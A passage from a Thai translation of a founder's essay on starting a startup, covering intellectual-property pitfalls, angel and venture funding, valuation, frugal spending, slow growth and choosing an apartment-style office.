ว่าเคยเซ็นเอกสารอะไรกับที่อื่นไว้บ้าง เพราะสิ่งที่แย่ที่สุดที่อาจเกิดขึ้นได้กับสตาร์ตอัพคือปัญหาทรัพย์สินทางปัญญา เราเคยเจอปัญหานี้เข้าเต็มๆ และมันส่งผลสะเทือนต่อเรามากกว่าคู่แข่งทุกรายของเราเสียอีก ตอนนั้นเรากำลังอยู่ระหว่างกระบวนการขายกิจการ เราค้นพบว่าทีมงานของเราคนหนึ่งเคยไปเซ็นสัญญาว่าไอเดียของเขาเป็นของบริษัทยักษ์ใหญ่แห่งหนึ่งที่เคยให้ทุนเขาเรียนปริญญาโทในอดีต ในทางทฤษฎีแล้วมันแปลว่าซอฟต์แวร์ส่วนหนึ่งของเรามีเจ้าของเป็นคนนอก ดังนั้นกระบวนการขายกิจการต้องหยุดชั่วคราวเพื่อเคลียร์ปัญหานี้ให้จบ ความซวยอยู่ที่ว่าตอนนั้นเรากำลังจะขายกิจการพอดี ทำให้เงินสดเรามีไม่เยอะนัก เราเลยต้องหาเงินสดเพิ่มเติมเพื่อให้บริษัทดำเนินการไปได้ แต่การระดมทุนเพิ่มโดยมีปัญหาทรัพย์สินทางปัญญาติดตัวอยู่ก็ไม่ใช่เรื่องง่าย เพราะนักลงทุนก็ประเมินไม่ถูกว่าปัญหานี้ร้ายแรงแค่ไหน นักลงทุนรายเดิมของเรารู้ว่าเรากำลังต้องการเงิน และไม่รู้จะไปหาเงินจากที่ไหน ก็พยายามช่วยเราโดยผมจะไม่ลงรายละเอียดในที่นี้ สิ่งที่บอกได้มีเพียงแค่ว่า angel แปลว่า “เทวดา” นั่นล่ะครับ ตอนนั้นผู้ก่อตั้งบริษัทเสนอวิธีลาออกจากบริษัทกันหมดเพื่อเลี่ยงปัญหากฎหมาย แล้วสอนพวกนักลงทุนว่าจะบริหารเซิร์ฟเวอร์ได้อย่างไรเพื่อให้กิจการเดินหน้าต่อไปได้ ช่วงนั้นสถานการณ์แย่มากเพราะว่าที่ผู้ซื้อกิจการก็เตรียมถอนตัวโดยเอาเหตุความล่าช้าเป็นข้ออ้าง แต่สุดท้ายปาฏิหาริย์ก็บังเกิด ทุกอย่างจบลงด้วยดี เราได้เงินลงทุนเพิ่มเติมคิดเป็นมูลค่าที่สมเหตุสมผล บริษัทยักษ์ใหญ่ส่งเอกสารให้เรายืนยันว่าเขาไม่มีส่วนเป็นเจ้าของซอฟต์แวร์ของเรา และอีกหกเดือนให้หลัง Yahoo ก็ซื้อกิจการเราด้วยมูลค่าที่เยอะกว่าตกลงไว้ตอนแรกเสียอีก ฉากจบของเราสมบูรณ์แบบ (แต่ประสบการณ์ในช่วงนั้นก็ทำผมแก่ลงไปหลายปีเหมือนกัน) ผมขอแนะนำว่าอย่าซ้ำรอยพวกเรา ก่อนจะตั้งบริษัทจงถามทุกคนในทีมว่ามีใครไปเซ็นสัญญาเรื่องทรัพย์สินทางปัญญาไว้ก่อนหรือเปล่า เมื่อจดบริษัทเสร็จเรียบร้อยแล้ว ก็ได้เวลาเดินไปเคาะประตูบ้านคนรวยๆ เพื่อขอเงินลงทุนกันสักที การเดินไปขอเงินหลักหมื่นดอลลาร์เพื่อลงทุนกับบริษัทเล็กๆ ของคนหนุ่มที่ยังมีแค่เพียงไอเดียอาจดูไกลเกินฝัน แต่ถ้าคุณลองมองจากสายตาของคนรวยๆ เหล่านี้ คุณจะมีกำลังใจมากขึ้น เพราะคนรวยส่วนใหญ่มองหาโอกาส “ลงทุน” เพื่อขยายทรัพย์สินของตัวเองออกไป ดังนั้นถ้าคุณคิดว่าตัวเองน่าจะประสบความสำเร็จทางธุรกิจ คุณก็ถือว่ากำลังช่วยเหลือคนเหล่านี้ให้มีโอกาสในการลงทุนที่ดี ตอนที่คุณเดินไปหาพวกเขาเพื่อขอเงิน เขาอาจจะเผลอคิดไปด้วยซ้ำว่าพวกคุณจะกลายเป็นกูเกิลรายต่อไปหรือเปล่า? โดยทั่วไปแล้ว นักลงทุนกลุ่ม angel มีความสำคัญทางการเงินเท่าเทียมกับผู้ก่อตั้งบริษัท พวกเขาจะได้หุ้นประเภทเดียวกับผู้ก่อตั้ง และมีโอกาสขายหุ้น-แตกหุ้นด้วยสัดส่วนที่เท่ากันเมื่อบริษัทรับเงินลงทุนในรอบถัดไป คำถามคือพวกเขาควรได้หุ้นสักเท่าไร? อันนี้ขึ้นกับว่าคุณทะเยอทะยานแค่ไหน สมมติว่าคุณให้หุ้นของบริษัทคิดเป็น x% ในราคา y ดอลลาร์ นั่นแปลว่าคุณกำลังพยายามกำหนดมูลค่าของทั้งบริษัท การลงทุนของพวก venture captical มักเรียกกันด้วยตัวเลขนี้ ดังนั้นถ้าคุณมอบหุ้นให้นักลงทุน 5% ของหุ้นที่มีอยู่ในราคา 100,000 ดอลลาร์ นั่นแปลว่าบริษัทของคุณมีมูลค่า 2 ล้านดอลลาร์ ทีนี้คุณจะตัดสินว่าบริษัทมีมูลค่าเท่าไรได้อย่างไร? ไม่มีคำตอบตายตัวสำหรับเรื่องนี้ เพราะในช่วงเวลานี้ของการตั้งบริษัทยังมีความเสี่ยงที่จะล้มเหลวสูง ผมไม่เข้าใจเรื่องนี้ตอนที่ระดมทุนครั้งแรก ตอนนั้น Julian คิดว่าบริษัทของเราน่าจะมีมูลค่าไม่กี่ล้านดอลลาร์ ซึ่งผมก็รู้สึกว่าเยอะแล้วเพราะเรามีโค้ดเพียงแค่ไม่กี่พันบรรทัดในมือ สุดท้ายแล้วเราตกลงกันได้ที่จำนวน 1 ล้านดอลลาร์ เพราะ Julian บอกว่าไม่มีใครอยากลงทุนในบริษัทที่มีมูลค่าน้อยกว่า 1 ล้านดอลลาร์หรอก \[6\] สิ่งที่ผมไม่เข้าใจในตอนนั้นคือ “มูลค่าของบริษัท” ไม่ได้เกี่ยวข้องกับมูลค่าของโค้ดที่เราเขียนได้ แต่มันคือมูลค่าของไอเดียที่เรามี (ซึ่งในภายหลังมันกลายเป็นไอเดียที่ถูกต้องสำหรับตลาด) และมูลค่าของงานที่เราจะทำในอนาคต (ซึ่งมาย้อนดูแล้วพบว่าเยอะมาก) การระดมทุนรอบถัดไปคือการเจรจากับพวกบริษัท venture capital (VC) ตัวจริง สิ่งที่ควรระวังคือคุณไม่ควรจะรอจนเงินรอบแรกหมดแล้วค่อยไปหาเงินรอบที่สองจากพวก VC เพราะพวกนี้ต้องใช้เวลาตัดสินใจนานพอสมควร (อาจใช้เวลาหลายเดือน) คุณคงไม่ต้องการเห็นเงินหมดในระหว่างที่กำลังเจรจากับพวก VC ใช่ไหมครับ การขอเงินจากบริษัท VC เป็นเรื่องใหญ่กว่าขอเงินจาก angel มาก จำนวนเงินจะเพิ่มขึ้นจากเดิมเยอะมาก ส่วนใหญ่เป็นหลักล้านดอลลาร์ ดังนั้นการเจรจาจะใช้เวลา คุณจะเสียหุ้นไปเยอะกว่าเดิม และมีเงื่อนไขข้อจำกัดมากมาย ในบางคราว VC อาจเสนอตั้ง CEO คนใหม่ที่เป็นคนของพวกเขา โดยให้เหตุผลว่าคุณต้องมีผู้บริหารที่มีประสบการณ์และเป็นผู้ใหญ่ มีพื้นฐานทางธุรกิจมาช่วยบริหารงาน ซึ่งเหตุผลนี้ก็ถูกในบางครั้ง อย่างไรก็ตาม เราก็เคยมีคนอย่างบิล เกตส์ ที่ยังเด็กมาก ประสบการณ์น้อย และไม่เคยทำธุรกิจ แต่เขาก็ผ่านมันมาได้ด้วยดี ในขณะที่สตีฟ จ็อบส์ ถูกไล่ออกจากบริษัทตัวเองโดยผู้ใหญ่ที่มีประสบการณ์ในโลกธุรกิจ และสุดท้ายก็บริหารแอปเปิลจนย่ำแย่ ดังนั้นผมคิดว่าประโยชน์ของผู้บริหารที่เป็นผู้ใหญ่และมีประสบการณ์อาจถูกพูดให้เกินจริงเกินไป เราเคยเรียกคนลักษณะนี้ว่า “ผู้ประกาศข่าว” เพราะพวกนี้หวีผมเนี้ยบ พูดด้วยน้ำเสียงทุ้มมั่นใจ และไม่ค่อยรู้เรื่องอะไรมากกว่าที่อ่านจากหน้าจอตอนประกาศข่าว ตอนนั้นเราคุยกับ VC หลายราย แต่สุดท้ายแล้วเราตัดสินใจใช้เงินจาก angel เพียงอย่างเดียว เหตุผลก็คือเรากลัวว่า VC ชื่อดังทั้งหลายจะบังคับให้เรารับ “ผู้ประกาศข่าว” มาเป็นผู้บริหาร ถ้าคนกลุ่มนี้เข้ามาทำงานแค่คุยกับสื่อก็อาจจะพอไหว แต่ถ้าเกิดว่าเขาอยากจะเข้ามาบริหารบริษัทเข้าจริงๆ ก็จะเป็นปัญหาใหญ่ได้ ซอฟต์แวร์ของเราซับซ้อนมากเกินกว่าพวกเขาจะเข้าใจ แนวทางการบริหารของเราคือเอาชนะคู่แข่งด้วยเทคโนโลยีที่ดีกว่า การตัดสินใจสำคัญทางยุทธศาสตร์ส่วนใหญ่มักเกี่ยวข้องกับเทคโนโลยี ซึ่งพวกเราทำกันเองได้อยู่แล้ว ไม่ต้องพึ่งผู้บริหารคนนอกในเรื่องนี้ นี่เป็นเหตุผลที่เราไม่ได้เข้าตลาดหุ้นด้วย ในปี 1998 CFO ของเราพยายามโน้มน้าวให้ผมเข้าตลาดหลักทรัพย์ บรรยากาศในตอนนั้นคือใครๆ ก็สามารถเข้าตลาดได้ ถึงแม้จะมีกิจการแค่เว็บพอร์ทัลขายอาหารหมา ดังนั้นบริษัทอย่างเราที่มีผลิตภัณฑ์ใช้งานได้จริง มีรายได้เข้ามาจริง ก็ย่อมเข้าตลาดหลักทรัพย์ได้สบาย แต่สิ่งที่ผมกลัวคือการเข้าตลาดแปลว่าเราต้องไปคุยกับ “ผู้ประกาศข่าว” ผู้ซึ่งบอกว่าตัวเอง “พูดภาษาเดียวกับวอลล์สตรีทได้” ผมดีใจที่เห็นกูเกิลปฏิเสธธรรมเนียมนี้ ตอนที่กูเกิลขายหุ้น IPO พวกเขาก็ไม่ได้พูดภาษาเดียวกับวอลล์สตรีท ผลคือวอลล์สตรีทไม่สนใจหุ้นของกูเกิลในตอนแรก และตอนนี้พวกเขาคงอยากเตะก้นตัวเองที่ไม่สนใจเรื่องนี้ ในโอกาสต่อๆ ไปพวกเขาคงให้ความสนใจมากขึ้น ตอนนี้วอลล์สตรีทเริ่มเรียนรู้ภาษาใหม่ๆ บ้างแล้ว เมื่อเงินขุมทรัพย์มหาศาลย้ายมาอยู่ในโลกเทคโนโลยี คุณจะพบว่าคุณมีอำนาจต่อรองกับ VC มากกว่าที่คุณคิดในตอนแรก เหตุผลก็คือการแข่งขันกันเองระหว่าง VC แต่ละบริษัทนั่นเอง ตอนนี้ผมรู้จักบริษัท VC หลายแห่งแล้ว ถ้าคุณไปคุยกับพวกเขา คุณจะเรียนรู้ว่าตลาดนี้ผู้ขายเป็นคนกำหนดราคา ไม่ว่าจะเป็นยุคสมัยไหน มีเงินมากเกินไปเสมอ และมีธุรกิจที่น่าลงทุนน้อยเกินไปเสมอ โลกของ VC จะจัดเรียงตัวกันเป็นรูปพีระมิด ชั้นบนสุดเป็นบริษัทชื่อดังอย่าง Sequoia และ Kleiner Perkins แต่ชั้นที่อยู่ข้างใต้ลงมาก็มีบริษัทอีกมากที่คุณไม่เคยได้ยินชื่อมาก่อน สิ่งที่ทุกบริษัทไม่ต่างกันคือเงินลงทุน ไม่ว่าจะเป็นเงินจากบริษัทไหน มันก็มีค่าเท่ากัน ถึงแม้บริษัทส่วนใหญ่จะบอกคุณว่าพวกเขาไม่ได้ให้แต่เงิน แต่ยังให้คำแนะนำและคอนเนคชั่นด้วยก็ตาม ประโยคนี้เป็นจริงถ้าหากคุณไปคุยกับคนอย่าง Vinod Khosla หรือ John Doerr หรือ Mike Moritz แต่การเข้าถึงคำแนะนำและคอนเนคชันระดับนี้มีราคาแพงที่คุณต้องจ่าย และถ้าคุณไล่ระดับชั้นในพีระมิดลงมาเรื่อยๆ VC ในระดับล่างลงมาจะฉลาดน้อยลงอย่างมาก เพียงไม่กี่ขั้นที่ถัดจาก VC ระดับท็อป คุณจะเจอกับนายธนาคารที่เพิ่งเรียนรู้คำศัพท์ในวงการจากการอ่านนิตยสาร Wired (เช่น ถามคุณว่าใช้ XML หรือเปล่า?) คำแนะนำของผมคืออย่าไปเชื่อคำอ้างของ VC ในเรื่องประสบการณ์และคอนเนคชันให้มากนัก โดยหลักการแล้ว VC เป็นแหล่งเงินทุน ดังนั้นถ้าเป็นผมแล้ว ผมมีแนวโน้มจะรับข้อเสนอจากบริษัทที่ให้เงินมากที่สุด ใช้เวลาพิจารณาสั้นที่สุด และมีเงื่อนไขน้อยที่สุด คุณอาจสงสัยว่าควรบอกข้อมูลให้กับ VC สักเท่าไร เพราะ VC บางรายอาจลงทุนในบริษัทคู่แข่งของคุณในอนาคตด้วย คำแนะนำของผมคืออย่าทำตัวลึกลับ ปกปิดข้อมูลจนเกินไป แต่ก็อย่าไปบอกข้อมูลพวกเขาทุกอย่าง ในความเป็นจริงแล้ว VC ส่วนใหญ่จะบอกคุณว่าพวกเขาสนใจทีมงานมากกว่าไอเดีย ซึ่งผมเห็นด้วยกับประโยคนี้ พวกเขาอยากคุยกับคุณเพราะอยากตัดสินว่าพวกคุณเวิร์คไหม ไม่ใช่ดูว่าไอเดียเวิร์คไหม ดังนั้นตราบเท่าที่คุณแสดงให้เขารู้ว่า พวกคุณรู้ตัวว่ากำลังทำอะไรอยู่ คุณก็อาจปกปิดข้อมูลบางเรื่องไม่ให้พวกเขารู้ได้ \[7\] คุณควรคุยกับ VC ให้เยอะที่สุดเท่าที่จะทำได้ แม้ว่าบางกรณีคุณจะไม่อยากได้เงินจากพวกเขาก็ตาม เนื่องจากว่า a) พวกเขาอาจรู้จักหรือลงทุนในบริษัทที่อยากซื้อกิจการของคุณ b) ถ้าคุณน่าประทับใจพอ พวกเขาอาจจะไม่ลงทุนในคู่แข่งของพวกคุณก็ได้ วิธีการที่ดีที่สุดในการเข้าหา VC (เพื่อแนะนำตัว ไม่ใช่เพื่อขอเงินลงทุน) คืองานสัมมนาที่จัดขึ้นเพื่อให้สตาร์ตอัพนำเสนอข้อมูลต่อ VC ## การไม่ใช้เงิน เมื่อคุณได้เงินมาจากนักลงทุนแล้ว คุณควรจะใช้มันอย่างไร? คำตอบคือ “อย่าใช้” บริษัทหน้าใหม่เกือบทุกแห่งที่ล้มเหลว มีสาเหตุเหมือนกันคือเงินหมด แน่นอนว่าถ้าพิจารณากันลึกๆ แล้ว มันมีเหตุผลของความล้มเหลวที่มากกว่านั้น แต่ทุกคนก็ควรเลี่ยงเหตุปัจจัยขั้นต้นคือเงินหมดอยู่ดี ในช่วงฟองสบู่ดอตคอม บริษัทส่วนมากพยายามโตให้เร็วที่สุด ในทางทฤษฎีมันแปลว่าการหาลูกค้าจำนวนมากในระยะเวลาอันสั้น แต่ในทางปฏิบัติมักกลายเป็นการจ้างคนจำนวนมากในเวลาอันรวดเร็วแทน ทุกคนย่อมอยากได้ลูกค้าจำนวนมากในระยะเวลาสั้นๆ แต่ประโยชน์ของมันอาจดูเกินจริงไปสักหน่อย วิธีคิดแบบนี้คือออกผลิตภัณฑ์ให้ได้เป็นคนแรก และกวาดลูกค้าเข้ามาอยู่กับเราให้หมดโดยไม่เปิดช่องให้คู่แข่งเลย แต่ผมคิดว่าประโยชน์ของการเข้าตลาดเป็นรายแรกไม่ได้เยอะขนาดนั้น กูเกิลเป็นตัวอย่างที่ดีในเรื่องนี้ ตอนที่กูเกิลปรากฏตัวขึ้นมา ตลาดค้นหาดูเหมือนจะอิ่มตัวและถูกครองโดยผู้เล่นรายใหญ่อย่าง Yahoo, Lycos, Excite, Infoseek, Altavista, Inktomi ที่ทุ่มเงินมหาศาลเพื่อสร้างแบรนด์ สถานการณ์ในปี 1998 อาจดูสายเกินไปแล้วสำหรับกูเกิลในการเจาะตลาดนี้ แต่ผู้ก่อตั้งกูเกิลรู้ดีว่าแบรนด์ไม่มีคุณค่าใดๆ ในโลกของการค้นหา ใครสักคนอาจสร้างเว็บค้นหาที่ดีกว่า และผู้ใช้จะค่อยๆ ย้ายมาใช้บริการของคุณเอง ในความเป็นจริงกูเกิลไม่เคยโฆษณาตัวเองเลยด้วยซ้ำ คู่แข่งที่ถูกกูเกิลโค่นควรใช้เงินโฆษณาเหล่านั้นไปกับการพัฒนาซอฟต์แวร์ของตัวเองมากกว่าการทุ่มเงินโฆษณา บริษัทสตาร์ตอัพในอนาคตควรเรียนรู้จากความผิดพลาดนี้ ถ้าคุณไม่ได้อยู่ในอุตสาหกรรมที่ผลิตภัณฑ์ยี่ห้อต่างๆ ใช้แทนกันได้ (เช่น ซิการ์ วอดก้า หรือผงซักฟอก) การทุ่มเงินเพื่อโฆษณาแบรนด์ของตัวเองเป็นสัญญาณว่าคุณกำลังจะแพ้ วงการเว็บเองมีเว็บเพียงไม่กี่แบบที่ใช้แทนกันได้ ตัวอย่างเช่น เว็บหาคู่เดททุ่มเงินโฆษณาจำนวนมหาศาล ซึ่งนั่นแปลว่าพวกเขากำลังแย่ (ผมชักได้กลิ่นว่าเว็บพวกนี้บริหารโดยนักการตลาด) ตอนนั้นเราถูกบีบด้วยสภาพการณ์โดยรอบให้ต้องโตอย่างช้าๆ และเมื่อย้อนมองดูในตอนนี้ มันกลับเป็นเรื่องดีมาก ผู้ก่อตั้งต้องเรียนรู้งานทุกชนิดในบริษัท ตัวผมเองนอกจากจะเขียนโค้ดแล้วยังต้องทำงานขายและสนับสนุนลูกค้าด้วย ผมยอมรับว่าทำงานด้านเซลส์ได้ไม่ดีนัก ผมเกาะไม่ปล่อยแต่ก็ไม่มีทักษะที่ลื่นไหลแบบที่เซลส์แมนพึงมี ผมมักบอกว่าที่ลูกค้าว่า “ถ้าคุณไม่หันมาขายสินค้าออนไลน์แปลว่าคุณโง่ และถ้าคุณเลือกใช้ซอฟต์แวร์ของบริษัทอื่นแปลว่าคุณโง่อีกนั่นแหละ” ประโยคเหล่านี้ถูกต้องในเชิงตรรกะแต่คงไม่เหมาะจะใช้ขายสินค้าสักเท่าไร งานที่ผมทำได้ดีกลับเป็นการสนับสนุนลูกค้า คุณลองคิดดูสิว่าถ้าแผนกสนับสนุนลูกค้ารู้ทุกอย่างเกี่ยวกับผลิตภัณฑ์นั้นๆ แถมยังขอโทษถ้าหากลูกค้าพบบั๊ก และแก้ไขให้ทันทีตอนที่คุยโทรศัพท์กันอยู่ จะเป็นเรื่องดีแค่ไหน ลูกค้าเลยรักเรามาก และเราก็รักลูกค้าของเราตรงที่พวกเขาจะบอกกันปากต่อปากช่วยให้เราเติบโตอย่างช้าๆ ลูกค้ากลุ่มแรกถือว่าฉลาดมากพอที่จะหาพวกเราเจอได้ด้วยตัวเขาเองโดยไม่ผ่านโฆษณาใดๆ และไม่มีอะไรล้ำค่าต่อบริษัทสตาร์ตอัพมากไปกว่าลูกค้าฉลาดๆ อีกแล้ว ถ้าคุณฟังความเห็นของพวกเขา คุณจะได้วิธีการปรับปรุงผลิตภัณฑ์ให้มีคุณภาพชั้นเลิศ แถมพวกเขายังไม่ได้ให้คำแนะนำกับคุณฟรีๆ เพราะพวกเขาจ่ายเงินให้คุณอีกด้วย เราเปิดตัวอย่างเป็นทางการช่วงต้นปี 1996 พอถึงปลายปี เรามีลูกค้าประมาณ 70 ราย ในยุคสมัยที่การเติบโตอย่างรวดเร็วเป็นกระแสหลัก ผมก็เริ่มกังวลว่าเราเล็กเกินไปและอ่อนแอเกินไป แต่ในความเป็นจริงแล้วเรากำลังเดินหน้าไปในทิศทางที่ถูกต้องที่สุด เพราะเมื่อคุณเติบโตแล้ว (ทั้งในแง่พนักงานและลูกค้า) การเปลี่ยนแปลงผลิตภัณฑ์จะทำได้ยากมาก ดังนั้นปีแรกจึงเปรียบเสมือนการลองผิดลองถูกของเราเพื่อพัฒนาซอฟต์แวร์ให้มีคุณภาพ สิ่งที่เกิดขึ้นในบั้นปลายคือเราแซงหน้าคู่แข่งทุกรายแบบไม่เห็นฝุ่น นอกจากนั้นแล้ว การที่แฮ็กเกอร์ทุกคนในบริษัทต้องคุยกับลูกค้าเป็นเวลานานๆ ทำให้พนักงานของเรารู้จักโลกออนไลน์คอมเมิร์ซดีกว่าคู่แข่งทุกราย นี่คือปัจจัยแห่งความสำเร็จของสตาร์ตอัพ ไม่มีอะไรสำคัญไปกว่าการเข้าใจธุรกิจของคุณ คุณอาจคิดว่าทุกคนในธุรกิจนี้ควรเข้าใจธุรกิจของตัวเองอยู่แล้ว แต่ในความเป็นจริงมันไม่ใช่แบบนั้น อาวุธลับของกูเกิลคือพวกเขาเข้าใจธุรกิจค้นหา ผมเคยทำงานอยู่ที่ยาฮูตอนที่กูเกิลปรากฏตัวขึ้นมา ยาฮูไม่เข้าใจธุรกิจค้นหาเอาเสียเลย ผมรู้เรื่องนี้เพราะผมเคยพยายามบอกฝ่ายบริหารให้ปรับปรุงคุณภาพของการค้นหา คำตอบที่ผมได้รับคือ “ยาฮูไม่ได้เป็นแค่บริษัทค้นหา” ระบบค้นหาเป็นแค่สัดส่วนเล็กๆ ของเพจวิวยาฮู และยาฮูกำลังกลายเป็น “บริษัทสื่อ” หรือ “พอร์ทัล” ส่วนการค้นหาอาจถูกตัดทิ้งไปได้ในอนาคต ถึงแม้การค้นหาจะเป็นแค่สัดส่วนเล็กๆ ของเพจวิวรวม แต่มันก็เป็นชิ้นส่วนที่สำคัญ เพราะมันเป็นจุดเริ่มต้นของทุกคนที่เริ่มใช้งานเว็บ ผมคิดว่าตอนนี้ยาฮูเข้าใจเรื่องนี้แล้วแหละ กูเกิลเข้าใจในสิ่งที่บริษัทอื่นๆ เกือบทั้งหมดไม่เข้าใจ คุณต้องให้ความสำคัญกับผู้ใช้ก่อนโฆษณา แม้ว่าโฆษณาจะทำเงินให้คุณและผู้ใช้ไม่เคยจ่ายเงินให้ คำคมที่ผมชอบอันหนึ่งคือ “ถ้าประชาชนไปที่ไหน ผู้นำจะตามไปที่นั่น” เฉกเช่นเดียวกับเว็บ ถ้าเราสร้างผู้ใช้งานได้เป็นจำนวนมากเมื่อใด โฆษณาจะตามมาเอง คุณควรออกแบบผลิตภัณฑ์เพื่อผู้ใช้ก่อน แล้วค่อยคิดหาวิธีทำเงินจากมันทีหลัง ถ้าคุณไม่เอาใจลูกค้าเป็นหลัก คุณจะเปิดช่องว่างให้คู่แข่งของคุณฉกลูกค้าไปแทน ในการสร้างผลิตภัณฑ์ที่ลูกค้ารัก คุณต้องเข้าใจลูกค้าเสียก่อน และยิ่งบริษัทคุณมีขนาดใหญ่ขึ้นเท่าไร คุณก็จะเข้าใจลูกค้าได้ยากขึ้น ดังนั้นผมจึงแนะนำให้คุณโตอย่างช้าๆ ยิ่งคุณหมดเงินช้าลงเท่าไร คุณก็จะได้เวลาสำหรับเรียนรู้ตลาดมากขึ้น อีกเหตุผลหนึ่งในการจ่ายเงินออกไปให้น้อยที่สุดคือการสร้างวัฒนธรรมของความประหยัดขึ้นมาในองค์กร ยาฮูเข้าใจเรื่องนี้ดี ตำแหน่งอย่างเป็นทางการของ David Filo ผู้ร่วมก่อตั้งบริษัทคือ “Chief Yahoo” แต่เขาชอบที่จะถูกเรียกว่า “Cheap Yahoo” มากกว่า หลังจากที่ผมถูกยาฮูซื้อไม่นาน เราก็ได้รับอีเมลจาก Filo ที่คอยดูฐานข้อมูลของเราอยู่ตลอด เขาถามเราว่าจำเป็นไหมที่จะต้องเก็บข้อมูลจำนวนมากของเราบนดิสก์แบบ RAID ราคาแพง ผมประทับใจเรื่องนี้มาก ตอนนั้นยาฮูมีมูลค่าตามราคาหุ้นเกือบพันล้านดอลลาร์ แต่พวกเขายังพยายามหาวิธีประหยัดเนื้อที่บนดิสก์ ไม่ต่างอะไรกับสมัยตั้งบริษัทใหม่ๆ เลย ในตอนที่คุณได้เงินหลักล้านดอลลาร์จากบริษัท VC มาเรียบร้อย ก็มีโอกาสสูงที่คุณจะรู้สึกว่า "ฉันรวยแล้ว" ตอนนั้น คุณควรจะรู้ตัวว่าคุณยังไม่รวย บริษัทที่รวยหมายความว่ามีรายได้เยอะ แต่เงินก้อนนี้ไม่ใช่รายได้ มันคือเงินที่นักลงทุนจ่ายให้คุณโดยหวังว่าคุณจะสร้างรายได้กลับมา ดังนั้นแม้ว่าในบัญชีคุณจะมีเงินเป็นล้านเหรียญ แต่ในทางปฏิบัติคุณยังยากจนอยู่ สตาร์ตอัพทั้งหลายควรยึดวิถีชีวิตแบบนักศึกษาปริญญาโท ไม่ใช่บริษัทกฎหมายยักษ์ใหญ่ คุณควรเท่แบบประหยัดแทนการทำตัวฟู่ฟ่าราคาแพง สิ่งหนึ่งที่ใช้ทดสอบว่าสตาร์ตอัพในยุคของเราเข้าใจเรื่องนี้หรือไม่ คือดูว่าบริษัทเหล่านี้มีเก้าอี้ยี่ห้อ Aeron หรือเปล่า เก้าอี้ยี่ห้อนี้ออกวางขายช่วงฟองสบู่ดอตคอมกำลังขาขึ้นและฮิตมากในหมู่สตาร์ตอัพ โดยเฉพาะบริษัทกลุ่มที่ตั้งโดยเด็กๆ ได้เงินสนับสนุนจาก VC และซื้อของเหมือนเด็กเล่นสร้างบ้าน ในขณะที่บริษัทของเราใช้เก้าอี้สำนักงานราคาถูก ใช้ไปแล้วที่วางแขนหลุดออกมา เรารู้สึกอับอายกับเรื่องนี้ แต่พอมาย้อนกลับไปมองในตอนนี้ บรรยากาศแบบนักศึกษาของเราเป็นสิ่งที่เราทำถูกต้องแล้ว โดยที่ตอนนั้นเราไม่รู้เรื่องเลย ออฟฟิศของเราอยู่ในอาคารเก่าสามชั้นที่ Harvard Square มันเคยเป็นอพาร์ทเมนต์เก่าจนถึงยุค 1970s และยังมีอ่างอาบน้ำที่มีขาตั้งแบบโบราณเหลืออยู่ ตึกนั้นคงเคยมีผู้อาศัยที่บ๊องๆ หน่อย เพราะรอยบนกำแพงถูกอุดด้วยฟอยล์อลูมิเนียม ราวกับว่ามันสามารถป้องกันรังสีคอสมิกได้ เรารู้สึกอายนิดๆ เวลามีแขกผู้ใหญ่มาเยี่ยมที่ออฟฟิศ แต่ในความเป็นจริงแล้ว ตึกนั้นเป็นสถานที่ที่เหมาะที่สุดสำหรับสตาร์ตอัพ เพราะมันช่วยให้เรารู้สึกว่าเป็นหมาจนตรอกที่ต้องสู้ยิบตา แทนที่จะรู้สึกเหมือนพนักงานบริษัทใหญ่ที่เสื้อเชิ้ตรีดซะเรียบ นั่นคือ “สปิริต” ที่คุณต้องมี อพาร์ทเมนต์แห่งนั้นยังเป็นสถานที่ที่เหมาะแก่การพัฒนาซอฟต์แวร์ ถ้าคุณเคยนั่งพัฒนาซอฟต์แวร์ในคอกของพนักงานบริษัททั่วไป คุณจะรู้ว่าบรรยากาศมันไม่เหมาะ แต่ถ้าคุณรู้สึกดีที่จะนั่งเขียนโปรแกรมที่บ้านมากกว่าที่ทำงาน แล้วทำไมไม่เปลี่ยนที่ทำงานให้เป็นเหมือนบ้านล่ะ? ตอนที่คุณมองหาสถานที่สำหรับเปิดบริษัท อย่าพยายามหาสถานที่ที่ดูเป็นมืออาชีพเกินไป ความหมายจริงๆ ของคำว่า “มืออาชีพ” คือ "ทำงานดี" ไม่ได้แปลว่าสำนักงานต้องมีลิฟต์หรือมีกำแพงเป็นกระจกใส ผมมักแนะนำให้สตาร์ตอัพพยายามเลี่ยงสำนักงานให้เช่า และหันไปเช่าอพาร์ทเมนต์แทน เพราะคุณจะต้องกินนอนอยู่ในออฟฟิศในช่วงที่เป็นสตาร์ตอัพ ดังนั้นคุณควรมองหาสถานที่ที่ออกแบบมาไว้อยู่อาศัยมาทำเป็นออฟฟิศ นอกจากอพาร์ทเมนต์จะมีข้อดีเรื่องราคาถูก และเป็นสถานที่ที่เหมาะแก่การทำงานแล้ว อพาร์ทเมนต์มักตั้งอยู่ในทำเลที่ดีกว่าสำนักงานให้เช่า สำหรับสตาร์ตอัพแล้วทำเลที่ตั้งเป็นสิ่งสำคัญมาก การที่จะทำงานได้อย่างมีประสิทธิภาพ พนักงานควรกลับมาทำงานหลังรับประทานข้าวเย็น เพราะช่วงเวลานี้ไม่มีใครโทรเข้ามา ไม่มีใครรบกวน ทำงานเสร็จได้ง่าย แถมการที่พนักงานออกไปทานข้าวเย็นกันเป็นกลุ่ม แลกเปลี่ยนไอเดียกันตอนทานข้าว และกลับเข้ามายังสำนักงานเพื่อลงมือทำตามไอเดียนั้นถือเป็นสิ่งที่เยี่ยมยอด คุณจึงควรอยู่ในทำเลที่มีร้านอาหารเยอะๆ ไม่ใช่อยู่ในสำนักงานให้เช่าที่กลายเป็นอาคารร้างหลังหกโมงเย็น ธรรมเนียมอันมีคุณค่านี้จะเริ่มหายไปเมื่อบริษัทเริ่มใหญ่ขึ้น เพราะพนักงานทุกคนจะขับรถกลับไปทานอาหารที่บ้านตัวเองกันหมด ถ้าคุณเริ่มกิจการด้วยสภาพแบบนั้น คุณก็ต้องพึ่งพาพระเจ้าให้ช่วยเหลือแล้ว ถ้าคุณจะเปิดบริษัทในวันนี้ ผมมีทำเลแนะนำเพียง 3 แห่ง คือ บนรถไฟสายสีแดง ใกล้กับ Central, Harvard หรือ Davis Square (Kendall ไม่เหมาะ) ถ้าเป็นที่ Palo Alto ก็ควรอยู่ที่มหาวิทยาลัยหรือ California Aves ส่วนที่ Berkeley ก็ควรเป็นด้านเหนือหรือด้านใต้ที่ติดกับพื้นที่มหาวิทยาลัย ทำเล 3 แห่งนี้เป็นสถานที่ที่ผมพบว่ามีบรรยากาศเหมาะสมกับการตั้งบริษัท วิธีการประหยัดเงินที่ดีที่สุดก็คือ "ไม่จ้างพนักงาน" 